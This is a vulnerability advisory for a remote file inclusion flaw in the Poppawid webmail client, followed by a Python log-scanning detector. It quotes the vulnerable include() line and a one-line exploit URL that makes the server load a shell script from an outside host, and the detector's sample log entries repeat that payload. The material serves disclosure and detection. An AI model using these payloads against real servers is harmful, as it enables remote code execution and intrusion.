vendor: Poppawid web-based email client
by: 0in
N/A
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Poppawid web-based email client
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Poppawid Remote File include

The vulnerability exists in the 'childwindow.inc.php' file of the Poppawid web-based email client, where line 33 passes the 'form' variable straight into a PHP include(). When 'register_globals' is on, an attacker can set 'form' through the URL and make the script include arbitrary files from remote servers. This can lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update Poppawid to a patched version that fixes the remote file inclusion vulnerability. Additionally, the 'register_globals' setting should be turned off.
Source

Exploit-DB raw data:

#Poppawid Remote File include
#f0und bY 0in
#Greetings to: All Dark-Coders Team Members
#IRC: #dark-coders at warszawa.irc.pl
#About:popper_mod-wid is a free (and popular), full featured web based email client
#Download:http://poppawid.sourceforge.net/
#No dork for script kiddies..;]
#Register_globals=On
#BUG:
poppawid/mail/childwindow.inc.php:33: <?php include($form.".form.inc.php");?>
Expl0it:
http://x.com/[path]/mail/childwindow.inc.php?form=http://h4x0r.org/shell.txt?

# milw0rm.com [2007-10-02]
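
One way to look for requests against this include in web-server access logs, as an added example that is not part of the original advisory or of Poppawid. It assumes Apache "combined" log format; the log entries, hosts, paths and the "compose" form name are constructed. It goes slightly beyond the remote case by flagging any 'form' value that is not a bare name.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of an access-log entry in Apache "combined" format (assumed).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# The include appends ".form.inc.php", so a legitimate value is a bare name.
BARE_NAME_RE = re.compile(r'[A-Za-z0-9_-]+')
# "scheme://" prefix: a stream wrapper that include() would fetch from.
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)

# Constructed sample entries; hosts, paths and the "compose" name are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Oct/2007:10:00:01 +0200] "GET /webmail/mail/'
    'childwindow.inc.php?form=compose HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Oct/2007:10:02:44 +0200] "GET /webmail/mail/'
    'childwindow.inc.php?form=http://files.example/shell.txt? HTTP/1.0" 200 312 "-" "-"',
    '198.51.100.23 - - [02/Oct/2007:10:05:13 +0200] "GET /webmail/mail/'
    'childwindow.inc.php?form=http%3A%2F%2Ffiles.example%2Fshell.txt%3F HTTP/1.0" 200 312 "-" "-"',
]

def classify_form(value):
    """Return None for a bare form name, otherwise a verdict string."""
    if BARE_NAME_RE.fullmatch(value):
        return None
    if WRAPPER_RE.match(value):
        return "remote-include"
    return "not-a-form-name"

def scan(lines):
    """Return (client_ip, verdict, decoded_value) for each suspect request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/childwindow.inc.php"):
            continue
        # parse_qs percent-decodes, so encoded variants are caught too.
        for value in parse_qs(url.query, keep_blank_values=True).get("form", []):
            verdict = classify_form(value)
            if verdict:
                findings.append((m.group("ip"), verdict, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

With 'register_globals' on, 'form' can also arrive in a POST body or a cookie, which a standard access log does not record, so a clean scan does not rule out an attempt.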